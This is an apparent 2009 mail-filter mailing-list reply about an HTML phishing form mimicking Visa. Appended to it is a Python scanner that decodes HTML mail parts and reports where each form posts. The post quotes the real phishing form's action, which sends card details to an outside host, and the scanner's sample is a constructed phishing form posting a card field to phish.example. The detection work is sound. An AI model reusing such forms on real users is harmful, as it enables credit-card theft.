HTML form scanning?

Kai Schaetzl maillists at conactive.com
Tue Apr 7 16:31:24 IST 2009


Jon Dustin wrote on Mon, 06 Apr 2009 11:47:46 -0400:

> If you care to decode the base64 attachment, it is an HTML form that
> appears to take much of its content from Visa, with one key change:
> 
> form name="frm" action="http://vatamu.org/vbv/w.php" method="post"
> onsubmit="return valFrm()"
> 
> If I'm not mistaken, this is trying to redirect the user's credit card details
> to vatamu.org.

Well, not "redirect", this is very "direct" ;-)

> 
> Should this message have been flagged? Or at least been marked in the HTML-part
> as "fraud attempt"?

No. The phishing detection compares the target of links with the content of links 
(e.g. what is displayed to the user). There is nothing that could be compared
against this form's action. I personally think that forms don't have anything to do 
in mail, so one should be able to "disarm" them. I don't know if the disarming 
functions in MailScanner already do this.

Have you actually tried in a mail program to use it? Most recent programs don't 
show any external content by default, so if that page pulls in images from visa 
these would normally not show. I don't know if posting the form would be 
considered "external" (I would), so posting may work or not.

> 
> Or is the encoded-part throwing off MS?

I don't think so, but Julian knows for sure.



Kai

-- 
Kai Schätzl, Berlin, Germany
Get your web at Conactive Internet Services: http://www.conactive.com
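
The check discussed in this message, as an added example that is not part of the original post and is not MailScanner code: a Python scanner that decodes every HTML MIME part (base64 included) and reports each form's action together with the host it posts to. The sample message, the file name `form.html` and the host `phish.example` are constructed for illustration.

```python
import base64
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormFinder(HTMLParser):
    """Collect the action attribute of every <form> start tag."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def find_form_actions(raw_message):
    """Return (filename, action, host) for each form in any HTML MIME part."""
    hits = []
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() != "text/html":
            continue
        # decode=True undoes the base64 / quoted-printable transfer encoding.
        payload = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "utf-8"
        finder = FormFinder()
        finder.feed(payload.decode(charset, errors="replace"))
        for action in finder.actions:
            hits.append((part.get_filename(), action, urlparse(action).hostname))
    return hits


# Constructed sample: an HTML form sent as a base64 attachment (host is made up).
_HTML = ('<html><body><form name="frm" action="http://phish.example/w.php" '
         'method="post"><input name="card"></form></body></html>')
SAMPLE = (
    'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="b1"\n\n'
    '--b1\nContent-Type: text/plain\n\nPlease complete the attached form.\n'
    '--b1\nContent-Type: text/html; name="form.html"\n'
    'Content-Transfer-Encoding: base64\n'
    'Content-Disposition: attachment; filename="form.html"\n\n'
    + base64.b64encode(_HTML.encode()).decode() + '\n--b1--\n'
)

if __name__ == "__main__":
    for name, action, host in find_form_actions(SAMPLE):
        print(f"{name}: form posts to {action} (host: {host})")
```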
